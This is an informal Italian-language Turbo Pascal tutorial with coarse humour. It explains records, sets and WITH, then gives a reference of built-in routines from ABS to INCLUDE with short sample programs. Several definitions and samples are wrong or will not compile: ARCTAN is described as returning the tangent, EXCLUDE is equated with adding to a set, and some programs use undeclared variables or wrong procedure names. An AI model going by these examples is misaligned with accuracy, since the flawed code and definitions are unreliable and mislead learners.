 |se ALFABETO fosse stato SET OF INTEGER ci sarebbero stati solo numeri e non |
 |caratteri                                                                   |
 |giustamente, numeri INTEGER :D                                              |
 |                                                                            |
 |i " : " che non vi ho mai spiegato, vuol dire che i dati in mezzo alle due  |
 |variabili                                                                   |
 |cioè                                                                        |
 |se io dico 1..5 , vuol dire 1,2,3,4,5                                       |
 |v'as capì?                                                                  |
 |                                                                            |
 |                                                                            |
 |  - I RECORD                                                                |
 |i record, è un altro dato strutturato contenente "celle" diverse            |
 |queste "celle" sono variabili, o costanti o quel che vi pare...             |
 |                                                                            |
 |dichiarazione:                                                              |
 |                                                                            |
 +----------------------------------------------------------------------------+
 |TYPE SETT = RECORD                                                          |
 |LUN:STRING;                                                                 |
 |MAR:STRING;                                                                 |
 |MER:STRING;                                                                 |
 |GIO:STRING;                                                                 |
 |VEN:STRING;                                                                 |
 |SAB:STRING;                                                                 |
 |DOM:STRING;                                                                 |
 |END;                                                                        |
 |                                                                            |
 |VAR SETTIMANA:SETT;                                                         |
 |                                                                            |
 |BEGIN                                                                       |
 |SETTIMANA.LUN:='Oggi vado dal dentista';                                    |
 |SETTIMANA.MAR:='Oggi vado con la tipa';                                     |
 |SETTIMANA.MER:='Oggi vado a fanculo';                                       |
 |SETTIMANA.GIO:='Oggi non so più che scrivere';                              |
 |SETTIMANA.VEN:='Oggi mi studio il turbo pascal';                            |
 |SETTIMANA.SAB:='Oggi faccio casino';                                        |
 |SETTIMANA.DOM:='Oggi riposo, e ricomincio';                                 |
 |END.                                                                        |
 +----------------------------------------------------------------------------+
 |                                                                            |
 |v'as capì?                                                                  |
 |poi useremo l'istruzione WITH per capire meglio come fare in questi situazze|
 |                                                                            |
 |  - IN                                                                      |
 |la parola riservata IN serve per individuare una certa variabile dentro un  |
 |set                                                                         |
 |                                                                            |
 +----------------------------------------------------------------------------+
 |program vedi;                                                               |
 |uses crt;                                                                   |
 |var                                                                         |
 |alfabeto,vocali,consonanti: set of char;                                    |
 |c:char;                                                                     |
 |                                                                            |
 |function abbassa(C:char):char;                                              |
 |begin                                                                       |
 |if c in ['A'..'Z'] then abbassa:=chr(Ord(C)+32)                             |
 |else abbassa:=c;                                                            |
 |end;                                                                        |
 |                                                                            |
 |begin                                                                       |
 |clrscr;                                                                     |
 |alfabeto:=['a'..'z'];                                                       |
 |vocali:=['a','e','i','o','u'];                                              |
 |consonanti:=alfabeto-vocali;                                                |
 |                                                                            |
 |repeat                                                                      |
 |c:=readkey;                                                                 |
 |if abbassa in vocali then writeln('Vocale...');                             |
 |if abbassa in consonanti then writeln('Consonante...');                     |
 |if not(abbassa in alfabeto) then writeln('Cazzo hai schiacciato?!?');       |
 |until c=chr(27);                                                            |
 |                                                                            |
 |end.                                                                        |
 +----------------------------------------------------------------------------+
 |                                                                            |
 |quindi, verifica se una variabile è dentro un insieme                       |
 |                                                                            |
 |                                                                            |
 |  - WITH                                                                    |
 |WITH è un semplice modo per operare sugli elementi dei record               |
 |così a parole, è difficile spiegarvelo, credo che capirete meglio con un    |
 |progettino...                                                               |
 |                                                                            |
 +----------------------------------------------------------------------------+
 |{progetto WITH}                                                             |
 |PROGRAM WITHUSE;                                                            |
 |USES CRT;                                                                   |
 |TYPE STRUCT = RECORD                                                        |
 |NOME:STRING;                                                                |
 |ETA:INTEGER;                                                                |
 |COGNOME:STRING;                                                             |
 |END;                                                                        |
 |                                                                            |
 |VAR UOMO:STRUCT;                                                            |
 |    TEMP,TEMP3:STRING;                                                      |
 |    TEMP2:INTEGER;                                                          |
 |                                                                            |
 |BEGIN                                                                       |
 |WRITE('Inserisci il tuo nome: ');                                           |
 |READLN(TEMP);                                                               |
 |WRITE('Inserisci la tua età: ');                                            |
 |READLN(TEMP2);                                                              |
 |WRITE('Inserisci il tuo cognome: ');                                        |
 |READLN(TEMP3);                                                              |
 |                                                                            |
 |WITH UOMO DO                                                                |
 | BEGIN                                                                      |
 |  NOME:=TEMP;                                                               |
 |  ETA:=TEMP2;                                                               |
 |  COGNOME:=TEMP3;                                                           |
 | END;                                                                       |
 |                                                                            |
 |CLRSCR;                                                                     |
 |WRITELN(UOMO.NOME);                                                         |
 |WRITELN(UOMO.ETA);                                                          |
 |WRITELN(UOMO.COGNOME);                                                      |
 |READKEY;                                                                    |
 |END.                                                                        |
 +----------------------------------------------------------------------------+
 |                                                                            |
 |                                                                            |
 |in pratica, non è niente di tanto "EXPERTISE" ma è solo qualcosa che fa     |
 |in modo che non si riscrive ogni volta:                                     |
 |                                                                            |
 |_NOMESTRUTT_._NOMEVAR_:=blablabla;                                          |
 |                                                                            |
 |v'as capì?                                                                  |
 |                                                                            |
 |ok, ora, finita tutta 'sta inutile pappardella, arriviamo al sodo del tute  |
 |                                                                            |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |                                                                            |
 |              LE FUNZIONI DEL TURBO PASCAL... ... ... ... ...               |
 |                                                                            |
 |FUNCTION ABS;                                                               |
 |FUNCTION ABS(X: TIPO):TIPO;                                                 |
 |                                                                            |
 |innanzitutto vi spiego perché ho messo "TIPO" invece di un tipo...          |
 |quel tipo, è QUALSIASI tipo numerico (INTEGER, REAL, SMALLINT, LONGINT)     |
 |tranne BYTE e WORD                                                          |
 |                                                                            |
 |questa funzione ritorna il valore assoluto della variabile (il positivo se  |
 |il numero è negativo, sempre positivo quando è positivo)                    |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |{progetto Abs}                                                              |
 |PROGRAM USINGABS;                                                           |
 |VAR A:REAL;                                                                 |
 |    B:INTEGER;                                                              |
 |                                                                            |
 |BEGIN                                                                       |
 |A:=2.7568;                                                                  |
 |B:=-45;                                                                     |
 |WRITELN(' Questo è il REAL: ',ABS(A):10:4);                                 |
 |WRITELN(' Questo è l''INTEGER: ',ABS(B));                                   |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |                                                                            |
 |                                                                            |
 |v'as capì?                                                                  |
 |                                                                            |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION ADDR;                                                              |
 |FUNCTION ADDR(X):POINTER;                                                   |
 |                                                                            |
 |ritorna l'indirizzo di qualsiasi oggetto (per puntatori, che studieremo)    |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE APPEND;                                                           |
 |PROCEDURE APPEND(VAR F:TEXT);                                               |
 |                                                                            |
 |apre un file dalla fine (il file dev'essere per forza un TEXT)              |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION ARCTAN;                                                            |
 |FUNCTION ARCTAN(X:REAL):REAL;                                               |
 |                                                                            |
 |Ritorna il TAN di un numero                                                 |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE ASSIGN;                                                           |
 |PROCEDURE ASSIGN(VAR F:STRING);                                             |
 |                                                                            |
 |assegna una stringa a un file (lezione scorsa)                              |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE ASSIGNED;                                                         |
 |PROCEDURE ASSIGNED(VAR P):BOOLEAN;                                          |
 |                                                                            |
 |verifica se il puntatore (P) non punta a niente (NIL) o punta a qualcosa    |
 |(@P)                                                                        |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE BREAK;                                                            |
 |PROCEDURE BREAK;                                                            |
 |                                                                            |
 |Termina un ciclo (che sia FOR, che sia WHILE, che sia REPEAT)               |
 |verrà visualizzato un errore se il break viene usato fuori da un ciclo      |
 |                                                                            |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto Break}                                                            |
 |PROGRAM USEBREAK;                                                           |
 |USES CRT;                                                                   |
 |VAR S:STRING;                                                               |
 |BEGIN                                                                       |
 |WHILE TRUE DO                                                               |
 | BEGIN                                                                      |
 |  READLN(S);                                                                |
 |  IF S = '' THEN BREAK;                                                     |
 |  WRITELN(S);                                                               |
 | END;                                                                       |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE CHDIR;                                                            |
 |PROCEDURE CHDIR(S:STRING);                                                  |
 |                                                                            |
 |Cambia la directory corrente, dove S è l'indirizzo della directory          |
 |                                                                            |
 |con l'opzione $I- all'inizio del programma, si può ottenere un risultato da |
 |IOResult che può essere 0 se niente è andato storto, diverso da 0 se qualche|
 |cosa  Kè andata storta (nell'uso di CHDIR)                                  |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto CHDIR}                                                            |
 |PROGRAM USECHDIR;                                                           |
 |USES CRT;                                                                   |
 |VAR S:STRING                                                                |
 |BEGIN                                                                       |
 |{$I-}                                                                       |
 |WRITELN('METTI LA NUOVA DIRECTORY');                                        |
 |READLN(S);                                                                  |
 |CH(S);                                                                      |
 |IF IORESULT <> 0 THEN WRITELN('CHE CARTELLA HAI MESSO?!?');                 |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION CHR;                                                               |
 |FUNCTION CHR(X:BYTE):CHAR;                                                  |
 |                                                                            |
 |Ritorna il carattere con lo specifico numero ASCII (X)                      |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto CHR}                                                              |
 |PROGRAM USECHR;                                                             |
 |USES CRT;                                                                   |
 |VAR A:BYTE;                                                                 |
 |BEGIN                                                                       |
 |CLRSCR;                                                                     |
 | FOR A:=0 TO 255 DO                                                         |
 |  BEGIN                                                                     |
 |   WRITE(CHR(A),' ');                                                       |
 |  END;                                                                      |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE CLOSE;                                                            |
 |PROCEDURE CLOSE(VAR F);                                                     |
 |                                                                            |
 |Chiude salvando le modifiche un file                                        |
 |con l'opzione $I-, IOResult ritorna 0 se l'operazione ha successo, se no, un|
 |valore diverso da 0                                                         |
 |                                                                            |
 |(non credo che servano esempi per questo...)                                |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION CONCAT;                                                            |
 |FUNCTION CONCAT(S1 [, S1,..., SN]:STRING):STRING;                           |
 |                                                                            |
 |concatena N stringhe, se il risultato è una stringa con più di 255 caratteri|
 |allora, la stringa sarà troncata                                            |
 |                                                                            |
 |anche se si può ottenere lo stesso risultato usando l'operatore '+'         |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto CONCAT e + }                                                      |
 |PROGRAM USECONCA;                                                           |
 |USES CRT;                                                                   |
 |VAR A,B,C:STRING;                                                           |
 |BEGIN                                                                       |
 |CLRSCR;                                                                     |
 |WRITELN('INSERISCI LE TRE STRINGHE DA CONCATENARE');                        |
 |READLN(A);                                                                  |
 |READLN(B);                                                                  |
 |READLN(C);                                                                  |
 |A:=A+B+C;                                                                   |
 |WRITELN(A);                                                                 |
 |A:=CONCAT(B,C);                                                             |
 |WRITELN(A);                                                                 |
 |A:=CONCAT('SUCCHIAMELO ','BASTARDONE!');                                    |
 |WRITELN(A);                                                                 |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE CONTINUE;                                                         |
 |PROCEDURE CONTINUE;                                                         |
 |                                                                            |
 |Continua l'esecuzione di un ciclo, che sia FOR, che sia WHILE che sia REPEAT|
 |                                                                            |
 |il compilatore causerà un errore se continue non è incluso in un ciclo      |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto CONTINUE}                                                         |
 |USES CRT;                                                                   |
 |VAR I:INTEGER;                                                              |
 |    NOME:STRING;                                                            |
 |    F:FILE OF CHAR;                                                         |
 |BEGIN                                                                       |
 |WRITELN('INSERISCI UN FILE');                                               |
 |READLN(NOME);                                                               |
 |ASSIGN(F,NOME);                                                             |
 |{$I-}                                                                       |
 |RESET(F);                                                                   |
 |{$I+}                                                                       |
 |IF IORESULT <> 0 THEN                                                       |
 | BEGIN                                                                      |
 |  WRITELN('FILE NON TROVATO...');                                           |
 |  CONTINUE;                                                                 |
 | END;                                                                       |
 |WRITELN(NOME, ': ',FILESIZE(F),' BYTES');                                   |
 |CLOSE(F);                                                                   |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION COPY;                                                              |
 |FUNCTION COPY(S:STRING; INDEX:INTEGER; COUNT:INTEGER):STRING;               |
 |                                                                            |
 |Ritorna la substringa in un'altra stringa                                   |
 |precisamente ritorna la stringa lunga COUNT caratteri partendo dall'indice  |
 |INDEX della stringa S                                                       |
 |                                                                            |
 |se l'indice è più lungo della lunghezza di S, COPY ritorna una stringa vuota|
 |se COUNT è maggiore dei caratteri rimanenti dall'indice alla fine, verrà    |
 |ritornata la stringa fino alla fine                                         |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto COPY}                                                             |
 |PROGRAM USECOPY;                                                            |
 |USES CRT;                                                                   |
 |VAR S:STRING;                                                               |
 |BEGIN                                                                       |
 |S:='FACCHIU';
 |S:=COPY(S,2,3);  { 'ACC' }                                                  |
 |WRITELN(S);                                                                 |
 |S:='FACCHIU';                                                               |
 |S:=COPY(S,8,10); { '' }                                                     |
 |WRITELN(S);                                                                 |
 |S:='FACCHIU';                                                               |
 |S:=COPY(S,3,90); { 'CCHIU' }                                                |
 |WRITELN(S);                                                                 |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION COS;                                                               |
 |FUNCTION COS(X:REAL):REAL;                                                  |
 |                                                                            |
 |Ritorna il coseno dell'argomento (X è un angolo in radianti)                |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto COS}                                                              |
 |PROGRAM USECOS;                                                             |
 |USES CRT;                                                                   |
 |VAR R:REAL;                                                                 |
 |BEGIN                                                                       |
 |R:=COS(PI);                                                                 |
 |WRITELN(R); {LA STESSA COSA DI SCRIVERE WRITELN(COS(PI));}                  |
 |END.                                                                        |
 |                                                                            |
 |{PER CHI NON AVESSE CAPITO COS'è QUEL PI, LO CAPIRA' LEGGENDO LA SEZIONE    |
 | VARIABILI E COSTANTI DEL TURBO PASCAL}                                     |
 |----------------------------------------------------------------------------|
 |FUNCTION CSEG;                                                              |
 |FUNCTION CSEG:WORD;                                                         |
 |                                                                            |
 |Ritorna il valore del registro CS                                           |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto CSEG}                                                             |
 |PROGRAM USECSEG;                                                            |
 |USES CRT;                                                                   |
 |                                                                            |
 |PROCEDURE SCRIVI_IN_HEX(W:WORD);                                            |
 |CONST                                                                       |
 |HEXCHAR:ARRAY [0..$F] OF CHAR = '0123456789ABCDEF'                          |
 |BEGIN                                                                       |
 |WRITE(HEXCHAR[HI(W) SHR 4],                                                 |
 |      HEXCHAR[HI(W) AND $F],                                                |
 |      HEXCHAR[LO(W) SHR 4],                                                 |
 |      HEXCHAR[LO(W) AND $F]);                                               |
 |END;                                                                        |
 |                                                                            |
 |BEGIN                                                                       |
 |WRITE('IL CODE SEGMENT è: ');                                               |
 |SCRIVI_IN_HEX(CSEG);                                                        |
 |WRITE('h');                                                                 |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |Per chi non avesse capito la procedure SCRIVI_IN_HEX, adesso la spiego:     |
 |vi spiego solo la procedura:                                                |
 |                                                                            |
 |innanzitutto vedete che nella dichiarazione CONST HEXCHAR                   |
 |trovate come indice dell'array un numero Esadecimale                        |
 |qualsiasi numero con l'$ prefisso è un numero Esadecimale per il compilatore|
 |                                                                            |
 |poi, usiamo un po' la testa                                                 |
 |HI(W) SHR                                                                   |
 |vuol dire:                                                                  |
 |                                                                            |
 |il byte più alto della word "shiftato" (spostato) a destra di 4             |
 |CIOè                                                                        |
 |                                                                            |
 |se il numero è 615, allora il byte superiore è 0 shiftato di 4 verso destra |
 |è sempre 0...                                                               |
 |quindi, il primo carattere scritto è 0                                      |
 |                                                                            |
 |poi, il byte superiore della word, AND $F (Fh) in ogni caso restituirà un   |
 |numero tra $0 e $F                                                          |
 |                                                                            |
 |spieghiamo un po'                                                           |
 |in pratica, se il byte superiore di 615 è 02, AND F otteniamo 2 (cioè, si   |
 |toglie la cifra che arriva alle "decine")                                   |
 |                                                                            |
 |ok, quindi 02 AND F = 2    -   e abbiamo il nostro secondo numero scritto   |
 |                                                                            |
 |                                                                            |
 |ora passiamo alla parte bassa, e qui stesso discorso                        |
 |(LO(W) SHR 4 ) = 67 SHR 4 = 6                                               |
 |(LO(W) AND $F ) = 67 AND F = 7                                              |
 |                                                                            |
 |v'as capì?   (è probabile ke qualcuno nn ha capito la parte degli HI xkè    |
 |spiegato un po' peggio del LO )                                             |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE DEC;                                                              |
 |PROCEDURE DEC(VAR X[; N:LONGINT]);                                          |
 |                                                                            |
 |Fa la sottrazione di due numeri                                             |
 |                                                                            |
 |DEC(X,N); è uguale a fare X := X - N;                                       |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE DELETE;                                                           |
 |PROCEDURE DELETE(VAR S:STRING; INDEX:INTEGER; COUNT:INTEGER);               |
 |                                                                            |
 |Cancella una substringa in S                                                |
 |o meglio, cancella COUNT lettere partendo da INDEXesimo carattere di S      |
 |qua, valgono le stesse regole per COPY                                      |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE DISPOSE;                                                          |
 |PROCEDURE DISPOSE(VAR P:POINTER [,DESTRUCTOR]);                             |
 |                                                                            |
 |Da vedere poi con NEW                                                       |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION DSEG;                                                              |
 |FUNCTION DSEG:WORD;                                                         |
 |                                                                            |
 |Ritorna il valore del registro DS (lo stesso uso di CSeg);                  |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION EOF;                                                               |
 |FUNCTION EOF(VAR F):BOOLEAN;                                                |
 |                                                                            |
 |Ritorna la fine del file... (ne abbiamo parlato due lezioni fa [o una])     |
 |                                                                            |
 |con l'opzione $I- IOResult ritorna 0 se l'operazione è avvenuta con successo|
 |altrimenti, un valore diverso da 0                                          |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto EOF}                                                              |
 |PROGRAM USEEOF;                                                             |
 |USES CRT;                                                                   |
 |VAR F:TEXT;                                                                 |
 |    C:CHAR;                                                                 |
 |    S:STRING;                                                               |
 |BEGIN                                                                       |
 |WRITELN('INSERISCI IL NOME DEL FILE');                                      |
 |READLN(S);                                                                  |
 |ASSIGN(F,S);                                                                |
 |RESET(F);                                                                   |
 |WHILE NOT EOF(F) DO                                                         |
 | BEGIN                                                                      |
 |  READ(F,CH);                                                               |
 |  WRITE(CH);                                                                |
 | END;                                                                       |
 |WRITELN;                                                                    |
 |WRITELN('FINE');                                                            |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION EOLN;                                                              |
 |FUNCTION EOLN [(VAR F:TEXT)]:BOOLEAN;                                       |
 |                                                                            |
 |Ritorna la fine della riga di un file TEXT                                  |
 |cioè, ritorna se si è arrivati alla fine della riga                         |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto EOLN}                                                             |
 |                                                                            |
 |{nel file è presente la scritta:                                            |
 | CIAO!                                                                      |
 | v'as capì?}                                                                |
 |PROGRAM USEEOLN;                                                            |
 |USES CRT;                                                                   |
 |VAR F:TEXT;                                                                 |
 |BEGIN                                                                       |
 |CLRSCR;                                                                     |
 |ASSIGN(F,'CIAO.TXT');                                                       |
 |RESET(F);                                                                   |
 |WRITELN(EOLN(F));      { FALSE }                                            |
 |CLOSE(F);                                                                   |
 |APPEND(F);                                                                  |
 |WRITELN(EOLN(F));      { TRUE }                                             |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE ERASE;                                                            |
 |PROCEDURE ERASE(VAR F);                                                     |
 |                                                                            |
 |cancella un file                                                            |
 |                                                                            |
 |con l'opzione $I- IOResult ritorna 0 se l'operazione ha successo, un valore |
 |diverso da 0 in tutti gli altri casi                                        |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto ERASE}                                                            |
 |PROGRAM USEERASE;                                                           |
 |VAR F:FILE OF CHAR;                                                         |
 |    C:CHAR;                                                                 |
 |    S:STRING;                                                               |
 |BEGIN                                                                       |
 |CLRSCR;                                                                     |
 |WRITELN('INSERISCI IL FILE');                                               |
 |READLN(S);                                                                  |
 |{$I-}                                                                       |
 |RESET(F);                                                                   |
 |{$I+}                                                                       |
 |IF IORESULT <> 0 THEN                                                       |
 | WRITELN('FILE NON TROVATO')                                                |
 |ELSE                                                                        |
 | BEGIN                                                                      |
 |  CLOSE(F);                                                                 |
 |  WRITELN('VUOI CANCELLARE ',S,' ?');                                       |
 |  READLN(CH);                                                               |
 |  IF UPCASE(CH) = 'S' THEN                                                  |
 |   ERASE(F);                                                                |
 | END;                                                                       |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |                                                                            |
 |PROCEDURE EXIT;                                                             |
 |PROCEDURE EXIT;                                                             |
 |                                                                            |
 |Termina immediatamente un blocco, se il blocco è il programma principale,   |
 |allora esce dal programma                                                   |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto EXIT}                                                             |
 |PROGRAM USEEXIT;                                                            |
 |USES CRT;                                                                   |
 |VAR C:CHAR;                                                                 |
 |PROCEDURE BLE;                                                              |
 | BEGIN                                                                      |
 |  REPEAT                                                                    |
 |   IF KEYPRESSED THEN EXIT;                                                 |
 |   WRITE('O_');                                                             |
 |  UNTIL FALSE;                                                              |
 | END;                                                                       |
 |                                                                            |
 |BEGIN                                                                       |
 |BLE;                                                                        |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE EXCLUDE;                                                          |
 |PROCEDURE EXCLUDE(VAR S:SET OF T; I:T);                                     |
 |                                                                            |
 |Esclude un elemento di un set                                               |
 |                                                                            |
 |S è un set di tipo T, mentre I è un espressione compatibile col tipo di S   |
 |l'elemento dato da I è escluso nel set dato da S                            |
 |                                                                            |
 |Exclude(S,I) è uguale a S:=S+(I);                                           |
 |                                                                            |
 |correlato con INCLUDE                                                       |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION EXP;                                                               |
 |FUNCTION EXP(X:REAL):REAL;                                                  |
 |                                                                            |
 |Ritorna il valore esponenziale del numero X                                 |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION FILEPOS;                                                           |
 |FUNCTION FILEPOS(VAR F):LONGINT;                                            |
 |                                                                            |
 |FUNCTION FILESIZE;                                                          |
 |FUNCTION FILESIZE(VAR F):LONGINT;                                           |
 |                                                                            |
 |FilePos:                                                                    |
 |Ritorna la posizione corrente del file (aperto)                             |
 |                                                                            |
 |FileSize:                                                                   |
 |Ritorna la grandezza in bytes del file (assegnato)                          |
 |                                                                            |
 |Con l'opzione $I-,su tutte e due le funzioni,IOResult darà 0 se l'operazione|
 |ha successo, altrimenti un valore diverso da 0                              |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto FILEPOS}                                                          |
 |PROGRAM USEFILEP;                                                           |
 |USES CRT;                                                                   |
 |VAR F:FILE OF CHAR;                                                         |
 |    I:BYTE;                                                                 |
 |    C:CHAR;                                                                 |
 |BEGIN                                                                       |
 |ASSIGN(F,'CIAO.TXT');                                                       |
 |REWRITE(F);                                                                 |
 |C:='A';                                                                     |
 |FOR I:=1 TO 100 DO                                                          |
 | BEGIN                                                                      |
 |  WRITE(F,C);                                                               |
 | END;                                                                       |
 |WRITELN(FILEPOS(F));                                                        |
 |WRITELN(FILESIZE(F));                                                       |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE FILLCHAR;                                                         |
 |PROCEDURE FILLCHAR(VAR X; COUNT:WORD; VALUE);                               |
 |                                                                            |
 |Riempe di un valore le celle di un array                                    |
 |                                                                            |
 |Eggzamples!                                                                 |
 |----------------------------------------------------------------------------|
 |{progetto FILLCHAR}                                                         |
 |PROGRAM USEFILLC;                                                           |
 |USES CRT;                                                                   |
 |VAR S:STRING;                                                               |
 |    A:ARRAY[0..10] OF BYTE;                                                 |
 |    B:ARRAY[0..10] OF REAL;                                                 |
 |BEGIN                                                                       |
 |FILLCHAR(S,SIZEOF(S),' ');   {le celle valgono tutte spazi (32) ' '}        |
 |FILLCHAR(A,SIZEOF(A),100);   {ora valgono tutte 100}                        |
 |FILLCHAR(B,SIZEOF(B),10);    {ora valgono tutte 10.0}                       |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE FLUSH;                                                            |
 |PROCEDURE FLUSH(VAR F:TEXT);                                                |
 |                                                                            |
 |Pulisce il buffer di un file Text aperto in output (REWRITE - APPEND)       |
 |                                                                            |
 |Con l'opzione $I- IOResult ritorna 0 se l'operazione ha successo, altrimenti|
 |un valore diverso da 0                                                      |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION FRAC;                                                              |
 |FUNCTION FRAC(X:REAL):REAL;                                                 |
 |                                                                            |
 |Ritorna la parte decimale di un numero                                      |
 |(se X vale 123.456 allora FRAC(X); = 0.456 )                                |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE FREEMEM;                                                          |
 |PROCEDURE FREEMEM(VAR P:POINTER; SIZE:WORD);                                |
 |                                                                            |
 |Distrugge una variabile memorizzata nell'heap di grandezza SIZE puntata da P|
 |P deve puntare a una regione della memoria dinamica, altrimenti popperà un  |
 |Run-Time Error                                                              |
 |                                                                            |
 |il progetto di esempio lo farò con GetMem                                   |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE GETDIR;                                                           |
 |PROCEDURE GETDIR(D:BYTE; VAR S:STRING);                                     |
 |                                                                            |
 |Ritorna la corrente directory di un Drive specifico                         |
 |dove D può essere                                                           |
 |                                                                            |
 |0 = DEFAULT                                                                 |
 |1 = A                                                                       |
 |2 = B                                                                       |
 |3 = C                                                                       |
 |                                                                            |
 |GetCurDir esegue la stessa funzione di GetDir, a differenza che GetCurDir   |
 |ritorna una stringa terminata da carattere nullo                            |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |{progetto GETDIR}                                                           |
 |PROGRAM USEGETDI;                                                           |
 |USES CRT;                                                                   |
 |VAR S:STRING;                                                               |
 |BEGIN                                                                       |
 |GETDIR(0,S);                                                                |
 |WRITELN('SIAMO NELLA DIRECTORY: ',S);                                       |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE GETMEM;                                                           |
 |PROCEDURE GETMEM(VAR P:POINTER; SIZE:WORD);                                 |
 |                                                                            |
 |Crea un blocco nell'heap dove allocare una variabile o un tipo che verrà    |
 |puntata/o poi da P                                                          |
 |                                                                            |
 |ATTENZIONE!                                                                 |
 |Size non può essere più grande di 65528 Bytes (quasi 64 Kb)                 |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto FREEMEM e GETMEM}                                                 |
 |PROGRAM USEFMGM;                                                            |
 |USES CRT;                                                                   |
 |                                                                            |
 |TYPE AMICO = RECORD                                                         |
 |              NOME:STRING[10];                                              |
 |              ETA:BYTE;                                                     |
 |             END;                                                           |
 |                                                                            |
 |VAR P:POINTER;                                                              |
 |                                                                            |
 |BEGIN                                                                       |
 |GETMEM(P,SIZEOF(AMICO));                                                    |
 |                                                                            |
 |{OPERAZIONI CHE STUDIEREMO POI CON L'USO DEI PUNTATORI}                     |
 |                                                                            |
 |FREEMEM(P,SIZEOF(AMICO));                                                   |
 |----------------------------------------------------------------------------|
 |PROCEDURE HALT;                                                             |
 |PROCEDURE HALT [(EXITCODE:WORD)];                                           |
 |                                                                            |
 |Termina l'esecuzione del programma per tornare al sistema operativo         |
 |                                                                            |
 |Exitcode è un parametro opzionale la cui espressione specifica il codice di |
 |uscita del programma                                                        |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto HALT}                                                             |
 |PROGRAM USEHALT;                                                            |
 |USES CRT;                                                                   |
 |BEGIN                                                                       |
 |IF TRUE THEN                                                                |
 | BEGIN                                                                      |
 |  IF TRUE THEN                                                              |
 |   BEGIN                                                                    |
 |    IF TRUE THEN                                                            |
 |     BEGIN                                                                  |
 |      HALT(1);    {QUI FINIRA' IL PROGRAMMA}                                |
 |     END;                                                                   |
 |   END;                                                                     |
 | END;                                                                       |
 |WRITELN('QUESTA SCRITTA NON LA SI VEDRA'' PERCHE'' IL PROGRAMMA è FINITO'); |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION HI;                                                                |
 |FUNCTION HI(X):BYTE;                                                        |
 |                                                                            |
 |Ritorna i bytes superiori di X  (INTEGER o WORD)                            |
 |                                                                            |
 |Ex.                                                                         |
 |HI($1234) = $12                                                             |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION HIGH;                                                              |
 |FUNCTION HIGH(X):BYTE;                                                      |
 |                                                                            |
 |Ritorna l'ultimo indice della cella di un array                             |
 |                                                                            |
 |Ex.                                                                         |
 |se dichiaro l'array STRONZO[0..50] allora HIGH(STRONZO) = 50                |
 |v'as capì?                                                                  |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE INC;                                                              |
 |PROCEDURE INC(VAR X [; N:LONGINT] );                                        |
 |                                                                            |
 |Incrementa una variabile numerica                                           |
 |                                                                            |
 |dove si può fare                                                            |
 |INC(X);   {INC := INC+1}                                                    |
 |INC(X,5); {INC := INC+5}                                                    |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE INCLUDE;                                                          |
 |PROCEDURE INCLUDE(VAR S:SET OF T; I:T);                                     |
 |                                                                            |
